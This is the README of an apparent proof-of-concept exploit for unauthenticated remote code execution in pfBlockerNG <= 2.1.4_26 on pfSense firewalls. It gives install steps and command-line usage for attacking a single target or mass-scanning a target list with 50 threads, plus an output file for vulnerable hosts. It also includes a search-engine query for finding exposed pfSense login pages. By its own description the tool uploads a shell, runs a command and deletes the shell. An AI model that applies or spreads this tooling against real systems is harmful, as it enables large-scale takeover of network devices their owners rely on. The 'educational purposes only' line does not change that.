This script is a proof-of-concept exploit for pfBlockerNG <= 2.1.4_26 that allows for remote code execution. It takes a single target URL or a list of URLs, uploads a shell, executes a command, and then deletes the shell.

This script requires Python 3.x and the requests and concurrent.futures modules to be installed. You can install these modules by running:

pip3 install requests concurrent.futures

or

pip3 install -r requirements.txt

usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]

pfBlockerNG <= 2.1.4_26 Unauth RCE

options:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        Console Command ('id')
  -l LIST, --list LIST  List of targets (list.txt)
  -i IP, --ip IP        Base target uri (ex. http://target-uri/)
  -t THREADS, --threads THREADS
                        Number of threads for mass scan
  -o OUTPUT, --output OUTPUT
                        Output file (vuln.txt)

To exploit a single target, use the -i or --ip flag and specify the base URL or IP Address:

python3 exploit.py -i http://target-uri/ -c 'id'

To scan a list of targets, use the -l or --list flag and specify the path to the list:

python3 exploit.py -l list.txt -c 'id' -t 50

The -t or --threads flag can be used to specify the number of threads to use for the scan.

If the -o or --output flag is specified, the list of vulnerable targets will be written to a file:

python3 exploit.py -l list.txt -c 'id' -o vuln.txt

http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="

This script is for educational purposes only. Use at your own risk.